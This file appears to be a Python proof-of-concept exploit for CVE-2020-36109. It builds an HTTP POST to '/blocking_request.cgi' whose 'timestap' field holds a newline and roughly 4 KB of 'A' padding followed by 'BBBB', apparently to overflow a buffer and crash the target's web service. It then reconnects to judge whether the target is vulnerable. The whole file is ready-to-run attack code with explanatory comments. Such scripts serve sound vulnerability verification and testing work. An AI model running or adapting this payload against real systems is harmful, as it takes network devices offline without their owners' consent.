poc.py
94 lines (76 loc) · 2.66 KB
#!/usr/bin/env python
import socket
import sys
import time
import hexdump
CVE = "CVE-2020-36109"  # identifier echoed in the verdict messages printed by the script
HOST = "127.0.0.1"      # default target; replaced by sys.argv[1] further down
PORT = 80               # default port; replaced by int(sys.argv[2]) when given
def recvuntil(s, timeout=5):
    """Drain a connected socket until the peer closes it or a read times out.

    Reads 8 KiB chunks from ``s`` (each read bounded by ``timeout`` seconds)
    and concatenates them as UTF-8 text. A ``socket.timeout`` simply ends the
    loop; any other socket or decoding error propagates to the caller.

    Returns ``(done, data)``: ``data`` is everything received, ``done`` is
    True only when ``data`` ends with the expected redirect-to-``/index.asp``
    HTML tail (three lines joined and terminated by CRLF).
    """
    expected_tail = "\x0d\x0a".join([
        "<html><head>",
        "<script>parent.location.href='/index.asp';</script>\x0a<meta http-equiv=\"Content-Type\" content=\"text/html\">",
        "</head></html>",
    ]) + "\x0d\x0a"
    collected = ''
    try:
        while True:
            s.settimeout(timeout)
            chunk = s.recv(1024 * 8).decode('utf-8')
            collected += chunk
            # An empty read means the peer closed the connection.
            if chunk == '':
                break
    except socket.timeout:
        pass
    return collected.endswith(expected_tail), collected
def header():
    """Assemble the request line and fixed headers for the POST.

    The Host, Referer and Origin headers are filled from the module-level
    ``HOST`` and ``PORT``. Content-Length and the blank line that closes the
    header block are deliberately NOT included; the caller appends them once
    the body is known.

    Returns the header block as a single CRLF-terminated str.
    """
    origin = "http://{}:{}".format(HOST, PORT)
    lines = [
        "POST /blocking_request.cgi HTTP/1.1",
        "Host: {}:{}".format(HOST, PORT),
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
        "Accept: */*",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "Connection: keep-alive",
        "Referer: {}/".format(origin),
        "Sec-GPC: 1",
        "Origin: {}".format(origin),
        "Pragma: no-cache",
        "Cache-Control: no-cache",
    ]
    return "".join(line + "\r\n" for line in lines)
def dos():
    """Build the complete HTTP request used by this proof of concept.

    Returns a str made of the headers from ``header()``, a Content-Length
    computed from the body, a blank line, and the form-encoded body.
    """
    buff = header()
    # Form field whose value is a single URL-encoded NUL byte.
    mac = "mac=%00"
    # Epoch timestamp 3605 s in the future, a URL-encoded newline (%0a), then
    # (0x1000 - 0xc - 1) 'A' bytes followed by "BBBB". The arithmetic hints at a
    # 0x1000-byte buffer on the target — inferred from the constants only, not
    # confirmed here. The 'timestap' spelling is kept verbatim; presumably it is
    # the field name the CGI parses.
    timestap = "timestap={}".format( int(time.time()) + 3600 + 5) + "%0a" + "A"*(0x1000-0xc-1) + "BBBB"
    buff1 = "interval=0&CName=whatever&" + timestap + "&" + mac
    # Content-Length is derived from the assembled body, so it matches what is sent.
    buff += "Content-Length: {}\r\n".format(len(buff1))
    buff += "\r\n"
    buff += buff1
    return buff
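# Command-line handling. Runs at import time, before the __main__ guard below.
# A missing target used to raise IndexError on sys.argv[1]; that case now prints
# the usage line and exits like -h / --help does.
if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help"):
    print("# Example usage: 'python3 {} <target-ip> <port>'\n".format(sys.argv[0]))
    sys.exit(0)
HOST = sys.argv[1]
PORT = 80
if len(sys.argv) > 2:
    # A non-numeric port raises ValueError here, as before.
    PORT = int(sys.argv[2])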
if __name__ == "__main__" :
    # Open one TCP connection and deliver the request assembled by dos().
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    buff = dos().encode('utf-8')
    hexdump0 = hexdump.hexdump(buff, result='return')
    print("[-] Sending:")
    # Only the head and tail of the hexdump are printed; the padding in between is elided.
    print("{}{}{}".format(hexdump0[:2233]," ... : .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ... \n", hexdump0[-226:]))
    s.send(buff)
    # recvuntil() reports done=True only when the reply ends with the expected redirect page.
    done, body = recvuntil(s)
    if done :
        hexdump0 = hexdump.hexdump(body.encode('utf-8'), result='return')
        print("\n[-] Recieving:")
        print(hexdump0)
        # Liveness check: after 4 s a second connect is attempted; a socket.error
        # is read as the service having gone down. NOTE(review): this is a
        # heuristic — any other reason for a refused connection (filtering,
        # restart, unrelated outage) yields the same "vulnerable" verdict.
        # The first socket is never closed; on success 's' is simply rebound.
        try :
            time.sleep(4)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            print("[x] Good, target isn't vulnerable to {}".format(CVE))
        except socket.error:
            print("[+] Target is vulnerable to {}".format(CVE))
        print("[+] DONE")
    else :
        # The reply did not end with the expected page, so no verdict is given.
        print("[X] Sems that target isn't doing the '/blocking_request.cgi' action right")